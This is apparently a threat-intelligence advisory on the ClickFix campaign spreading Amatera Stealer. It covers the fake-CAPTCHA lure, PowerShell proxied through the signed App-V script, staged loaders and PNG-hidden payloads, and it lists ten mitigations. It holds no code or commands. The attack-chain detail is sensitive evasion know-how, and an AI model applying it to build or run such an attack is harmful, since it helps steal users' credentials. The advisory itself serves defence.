The ClickFix attack campaign represents a sophisticated evolution of social engineering combined with living-off-the-land (LotL) techniques to distribute the Amatera information stealer. The attack begins with a fake CAPTCHA prompt designed to deceive users into copying and pasting a malicious command into the Windows Run dialog. Unlike traditional ClickFix attacks that invoke PowerShell directly, this campaign abuses the signed Microsoft Application Virtualization (App-V) script SyncAppvPublishingServer.vbs, a trusted Visual Basic Script, to proxy PowerShell execution. This approach bypasses PowerShell execution restrictions and avoids common detection mechanisms by leveraging a legitimate, signed Windows component. The App-V script downloads an obfuscated in-memory loader from an external server using wscript.exe, which then fetches configuration data from a public Google Calendar ICS file. This externalized configuration allows rapid infrastructure rotation and flexible delivery without redeploying initial infection stages. Subsequent stages include executing intermediate PowerShell loaders and retrieving encrypted payloads concealed within PNG images via WinINet APIs. These payloads are decrypted and decompressed in memory before executing shellcode that launches the Amatera Stealer. The campaign includes anti-sandbox checks and requires manual user interaction, making automated detection and analysis difficult. The use of trusted third-party services and blockchain smart contracts for payload delivery further complicates detection. ClickFix and its variants (JackFix, CrashFix, GlitchFix) have been widely adopted by threat actors since 2025, targeting social media content creators and businesses seeking verification to facilitate account takeover. The campaign’s reliance on legitimate user actions and trusted system tools presents unique challenges for endpoint detection and response solutions. The App-V component is only present in Windows Enterprise and Education editions, indicating a focus on enterprise environments. The campaign’s modular design and use of living-off-the-land binaries exemplify advanced attacker tradecraft aimed at stealth and persistence.

European organizations using Windows Enterprise or Education editions are particularly vulnerable due to the presence of the App-V component required for the attack chain. The campaign targets high-value individuals and businesses involved in social media content creation and verification processes, which are prevalent across Europe’s digital economy. Successful infections lead to the deployment of the Amatera information stealer, risking the exfiltration of sensitive credentials, tokens, and personal data, potentially resulting in account takeovers, financial fraud, and reputational damage. The use of trusted Microsoft components and legitimate third-party services complicates detection, increasing the likelihood of prolonged undetected presence within networks. The requirement for user interaction and clipboard manipulation means that phishing and social engineering defenses are critical. The campaign’s modular and flexible infrastructure allows rapid adaptation, increasing operational resilience and persistence. Given Europe’s strong regulatory environment (e.g., GDPR), data breaches resulting from such infections could lead to significant compliance penalties and legal consequences. The attack’s stealth and evasion techniques also pose challenges for incident response teams, potentially increasing remediation costs and operational disruption.

European organizations should implement targeted mitigations beyond generic advice: 1) Disable or restrict the use of App-V components where not required, especially SyncAppvPublishingServer.vbs, through application control policies or Windows Defender Application Control (WDAC). 2) Employ advanced endpoint detection and response (EDR) solutions capable of detecting living-off-the-land techniques and monitoring unusual usage of trusted signed scripts and binaries. 3) Enforce strict clipboard monitoring and user education programs to reduce the risk of users executing commands copied from untrusted sources. 4) Implement network controls to monitor and restrict outbound connections to suspicious domains, including those hosting payloads or configuration files (e.g., jsDelivr CDN, Google Calendar ICS files). 5) Use multi-factor authentication (MFA) and continuous session validation to mitigate the impact of stolen credentials and tokens. 6) Deploy sandboxing and behavioral analysis tools that can detect multi-stage, in-memory PowerShell execution and obfuscated payloads. 7) Regularly audit and harden browser and social media platform security settings to reduce the risk of token theft via social engineering. 8) Monitor for indicators of compromise related to Amatera Stealer and ClickFix variants, including unusual PowerShell activity proxied through App-V scripts. 9) Collaborate with threat intelligence sharing communities to stay updated on evolving ClickFix tactics and infrastructure. 10) Consider restricting or monitoring the use of wscript.exe and other scripting hosts in enterprise environments.